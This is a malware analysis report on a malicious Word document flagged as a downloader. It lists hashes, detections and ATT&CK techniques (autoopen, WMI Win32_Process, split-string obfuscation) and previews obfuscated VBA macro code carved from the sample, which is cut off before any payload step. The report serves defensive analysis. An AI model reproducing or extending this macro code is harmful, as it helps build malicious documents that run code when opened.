Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 178f9807e09da56f…

MALICIOUS

Office (OLE)

228.2 KB Created: 2019-04-23 12:52:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: f065d501429a80a725d43d59dd8b3f92 SHA-1: e8a561e1ee7f5a1e057ad8a97267c382a4651857 SHA-256: 178f9807e09da56ff02b4c72907f5cec2a567527da4ee515aa6453f47e52a787
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File Execution: Malicious Script

The sample contains a VBA macro with an autoopen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes GetObject and CreateObject to launch the Win32_Process service, indicating an attempt to execute arbitrary commands or spawn new processes. This behavior is characteristic of a downloader or dropper malware.

Heuristics 9

  • ClamAV: Doc.Downloader.00536d-6953162-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6953162-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54301 bytes
SHA-256: 3034ed6ee9f54b3c54f05739a1bdb76ee0fa801cddf7b876badd120454143ec0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "D1CcBZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fc_AAwA"
Attribute VB_Base = "0{81F90046-F000-4EF9-AF44-F42FE0A55724}{D2C3B2C8-BE07-4ECD-988A-C0C25F148762}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pwZDAx4"
Attribute VB_Base = "0{245879DE-D904-4092-A412-925BDFF02726}{3023D2C9-3203-4739-ABA4-99AAB363E9ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "k4DQDCA"
Sub autoopen()
   If jA1DBkU_ = aBXAAAB Then
     o1AUBUAA = jAAAAABo - JxQZD4Q
       ElseIf bA_DkDAA = kZDBUBXU Then
      Select Case m4_BCAQ
         Case 548330168
       z4CA4k = 215027331 * o1ZAA1AA / 432869682 * Hex(45369085 * Fix(uDAXCX / CStr(T4oGAU) * cc4DBxA - Fix(155235434)) - 217795143 * Round(dAAAZA + Hex(bA4AA4) / 188623171 - 317710786))
       sDAw4AA = RoXZcGA + XAUDAAQ * SGAGGAAD / Sqr(SwGAAAZX) / 358119641 - Hex(wxBBoAx) + (502493277 / 648866648)
      End Select
End If
   If uD_UQB = wDAABwQ Then
     QA1DAAG = wDBZAX_A - pAQ_ZAA
       ElseIf XAXQACCk = dCQZAAwx Then
      Select Case GDBAUU
         Case 149865841
       pAADxAA = 753230773 * cBA41wUx / 835856014 * Hex(874199805 * Fix(iAZQDB / CStr(RQAQAw) * oQ_AUXA - Fix(404708608)) - 65759152 * Round(JxDAAA + Hex(zB_A4x) / 409937193 - 509705358))
       OBDDAwA = cUQk_DB + w_Qc_D * QkoA1GAc / Sqr(KDXAAA) / 436852278 - Hex(YAc1AA1Q) + (284271312 / 666074343)
      End Select
End If
   If jD4oUAcA = AA_BAG Then
     O1AAUAD = DCBAwA - KAC4Ak
       ElseIf vBZ4cAA = JGGQU1AA Then
      Select Case pDUQDDAB
         Case 337206151
       AXAAQ_4k = 287716091 * NUAwGAAA / 137715823 * Hex(972143959 * Fix(XZQDAQ / CStr(vUDAZ4_4) * ZD_DAG - Fix(732554291)) - 104242557 * Round(C1Aokc + Hex(NUA4AAAo) / 631215250 - 880653204))
       tXAA_B = koDAk_A + LAQcAA * tDA1AxBD / Sqr(rAkU1w) / 228124811 - Hex(CUZAAXB) + (411062262 / 830862959)
      End Select
End If
jGCcxk
   If i1UX4A = d_DBBX Then
     oUAAQ1 = WUA44A - lUAAXB
       ElseIf cBADZAX = BBU4QADA Then
      Select Case vADQwZAo
         Case 854977795
       CAC1QXQG = 657574852 * wQBAABX / 375665113 * Hex(676201702 * Fix(FBkXAQBD / CStr(SocAA1) * r4BAUU - Fix(594406761)) - 961488528 * Round(iG__AD + Hex(K4kxA1) / 440327719 - 195188270))
       iDZ1AwB_ = WU4Dx4Q + tCAAAkAA * NAwAUUUA / Sqr(OA_GZG) / 479791808 - Hex(zXQBDU) + (956723461 / 675525872)
      End Select
End If
   If VAAcAkAC = MQoQZX Then
     Zk14QxQ = KDoAkXDA - lcABUUX
       ElseIf VX1QAUGG = MAXZwkoA Then
      Select Case SADoAA
         Case 366255453
       dXAQAA = 726970143 * wxAZGAU / 311388801 * Hex(529683524 * Fix(mBGAAZ / CStr(VADDZUBA) * NAZXDQQU - Fix(847712179)) - 135548263 * Round(Q1oAQAQ + Hex(WAAZ4o) / 652634622 - 917306054))
       iZ4AwAQ_ = fA_QA4 + YokkX_B * kAAoAA1 / Sqr(lxGAcA) / 659198582 - Hex(oXA4xAX) + (445893266 / 218018011)
      End Select
End If
   If KUxcAw_B = wDwxCc Then
     VQAGDA = BCXAADGA - QAAADXA
       ElseIf NABkCG = mXQ1DZA Then
      Select Case SAABGAA
         Case 537736671
       MDGAQAB = 232146891 * sAwABCc / 68509124 * Hex(135825386 * Fix(ZABAZBw / CStr(GB1wAU) * zCAAAUGk - Fix(422903076)) - 128044183 * Round(DDU_AQCk + Hex(a4AUA1) / 964875455 - 17394717))
       vADXCU = uUDUCBA + qUZ_Ak * h4CDUAU / Sqr(qA1wZA) / 913202339 - Hex(wcAAAA) + (565741123 / 116773894)
      End Select
End If
End Sub

Attribute VB_Name = "NAAGAx"
Function jGCcxk()
On Error Resume Next
   If sxAXQB = OBwBAc1c Then
     iQQACX1 = WCQCwB - kcAA_D
       ElseIf ODAAAAAA = zQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.